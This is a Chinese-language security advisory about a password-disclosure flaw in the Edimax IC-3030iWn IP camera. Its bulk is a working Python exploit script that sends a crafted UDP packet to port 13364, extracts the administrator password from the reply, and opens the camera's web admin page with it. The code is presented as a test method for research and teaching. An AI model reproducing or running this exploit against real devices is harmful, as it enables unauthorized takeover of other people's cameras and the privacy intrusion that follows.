Edimax IC-3030iWn UDP报文密码信息泄露漏洞
Edimax IC-3030iWn UDP报文密码信息泄露漏洞
发布日期:2012-06-14
更新日期:2012-06-26
受影响系统:
Edimax IC-3030iWn
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 54006
Edimax IC-3030iWn是网络监控器。
Edimax IC-3030iWn没有正确地身份验证机制,通过发送凭证到客户端进行身份验证,可被利用泄露管理员密码。
<*来源:y3dips (y3dips@echo.or.id)
链接:http://secunia.com/advisories/49524/
http://packetstormsecurity.org/files/113553/Edimax-IC-3030iWn-Authentication-Bypass.html
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
y3dips (y3dips@echo.or.id)提供了如下测试方法:
#!/usr/bin/env python
"""
# Exploit Title: Edimax IC-3030iWn Web Admin Auth Bypass exploit
# Date: 4 April 2012
# Exploit Author: y3dips@echo.or.id, @y3dips
# URL: http://echo.or.id
# Vendor Homepage: http://www.edimax.com
# Sourcecode Link: http://www.edimax.com/en/produce_detail.php?pd_id=352&pl1_id=8&pl2_id=91
# Also Tested on:
- Edimax IC-3015
- Airlive WN 500
# Bug found by: Ben Schmidt for RXS-3211 IP camera http://www.securityfocus.com/archive/1/518123
# To successfully automate your browser launch, change browser path.
"""
import socket
import webbrowser
import sys
if len(sys.argv) != 2:
print "Eg: ./edimaxpwned.py edimax-IP"
sys.exit(1)
port=13364
target= sys.argv[1]
def read_pw(target, port):
devmac = "\xff\xff\xff\xff\xff\xff"
code="\x00\x06\xff\xf9" #for unicast reply
data=devmac+code
sock =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
sock.connect((target,port))
try:
sock.send(data)
sock.settimeout(5)
tmp = sock.recv(4096)
return tmp
except socket.timeout:
return None
def pwned_edi():
data=read_pw(target, port)
if data != None:
data=data[365:377]
pw=data.strip("\x00")
webbrowser.get("/Applications/Firefox.app/Contents/MacOS/firefox-bin %s" ).open('http://admin:'+pw+'@'+target+'/index.asp')
else:
print "Socket timeOut or not Vulnerable"
pwned_edi()
建议:
--------------------------------------------------------------------------------
厂商补丁:
Edimax
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.edimax.com.tw/
评论暂时关闭